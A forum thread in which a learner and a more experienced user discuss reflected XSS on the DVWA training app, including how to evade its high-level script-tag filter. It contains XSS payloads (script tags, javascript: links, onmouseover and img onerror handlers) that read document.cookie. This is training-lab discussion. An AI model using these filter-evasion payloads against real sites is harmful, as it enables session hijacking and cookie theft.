pierre Posted June 28, 2016 Share Posted June 28, 2016 (edited) Hello, I know my question is a little bit unclear. But with Firebug, I've find a potential XSS by adding a javascript instruction in an HTML field at URL 192.168.1.1/DVWA/vulnerabilities/xss_r/: <a href='javascript:alert(document.cookie)'>Home</a> Original field was : <a href="../../.">Home</a> My question would be: How does an attacker send a malicious link to a victim with a webpage modification included into the link ? Edited June 28, 2016 by tot94 Quote Link to comment Share on other sites More sharing options...
digininja Posted June 28, 2016 Share Posted June 28, 2016 Look at what gets sent to the server when you submit data then look at how you can modify it as part of the attack. Rather than asking questions about every section on DVWA, have you considered doing an intro course? You'd learn a lot more. I'd recommend looking at stuff from SecurityTube. Quote Link to comment Share on other sites More sharing options...
pierre Posted June 28, 2016 Author Share Posted June 28, 2016 (edited) an intro course : have you got any URL ? But on online videos, there are only attacker-server. For SQLi, it is fine, whereas in XSS or CSRF, the situation is victim-attacker-server which is not present on online videos.. Edited June 28, 2016 by tot94 Quote Link to comment Share on other sites More sharing options...
digininja Posted June 28, 2016 Share Posted June 28, 2016 Quote an intro course : have you got any URL ? Search for SecurityTube Quote For SQLi, it is fine, whereas in XSS or CSRF, the situation is victim-attacker-server which is not present on online videos.. XSS doesn't go through the attacker, it goes direct. Quote Link to comment Share on other sites More sharing options...
pierre Posted June 29, 2016 Author Share Posted June 29, 2016 For XSS reflective, a link has to be send to the victim. I haven't look for XSS stored yet Quote Link to comment Share on other sites More sharing options...
digininja Posted June 29, 2016 Share Posted June 29, 2016 You said victim-attacker-server but that isn't right for reflected XSS, that goes attacker-victim-server Quote Link to comment Share on other sites More sharing options...
pierre Posted June 29, 2016 Author Share Posted June 29, 2016 1 hour ago, digininja said: You said victim-attacker-server but that isn't right for reflected XSS, that goes attacker-victim-server I was just quoting the differents actors...... Quote Link to comment Share on other sites More sharing options...
digininja Posted June 29, 2016 Share Posted June 29, 2016 I'm now lost, what is your question again? Quote Link to comment Share on other sites More sharing options...
pierre Posted July 6, 2016 Author Share Posted July 6, 2016 (edited) I have ever perform javascript injection by sending a malicious link to a victim like this : http://192.168.1.1/DVWA/vulnerabilities/xss_r/?name=<script>alert(document.cookie);</script> But here I need to remove protection on the page by injecting javascript in HTML events like this : <a href="javascript:alert(document.cookie)">Click me</a> But I have to modify with HTML page code with Firebug. So I where wondering how I could send a link with javascript in HTML event to a victim in order to steal cookies ? Edited July 6, 2016 by tot94 Quote Link to comment Share on other sites More sharing options...
digininja Posted July 6, 2016 Share Posted July 6, 2016 you would send them this and ask them to click on it http://192.168.1.1/DVWA/vulnerabilities/xss_r/?name=<script>alert(document.cookie);</script> you don't modify anything. Quote Link to comment Share on other sites More sharing options...
pierre Posted July 11, 2016 Author Share Posted July 11, 2016 No here I can't because of this pattern : /<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i It intercept <script> tag and replace it with a space. So I have to bypass this hardening whit HTML Event which what I describe above. But I don't know how to send the link whith HTML page modified.. Am I more understandable ? Quote Link to comment Share on other sites More sharing options...
digininja Posted July 11, 2016 Share Posted July 11, 2016 I think you've miss understood how reflected works. At the dvwa level you send out a link that the user clicks on and that is it, it does direct to the user then direct to the site, if you are interpreting things then it isn't XSS. Which level are you trying to solve? Quote Link to comment Share on other sites More sharing options...
pierre Posted July 11, 2016 Author Share Posted July 11, 2016 The HIGH level. I think I don't understand how XSS works along HTML event.. Quote Link to comment Share on other sites More sharing options...
digininja Posted July 11, 2016 Share Posted July 11, 2016 Look at what the page is filtering $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); Now look at this XSS cheat sheet and spot a way to send XSS that doesn't get caught by this regex check: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet Enter that into the field and see what happens. Now look at where you are and work out how you would get that to a user in a way they could click on it. Quote Link to comment Share on other sites More sharing options...
pierre Posted July 12, 2016 Author Share Posted July 12, 2016 Yes I've found the section able to bypass the hardening : Malformed A tags Skip the HREF attribute and get to the meat of the XXS... Submitted by David Cross ~ Verified on Chrome <a onmouseover="alert(document.cookie)">xxs link</a> or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script. <a onmouseover=alert(document.cookie)>xxs link</a> Thanks :) Quote Link to comment Share on other sites More sharing options...
digininja Posted July 12, 2016 Share Posted July 12, 2016 Do you understand the concept now? You don't need to intercept things, all the interaction is between victim and site. Your job is to work out what to ask the victim to request. For an attack string, my usual weapon of choice is <img src="x" onerror="alert(1)" /> As it triggers without the user having to do anything. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.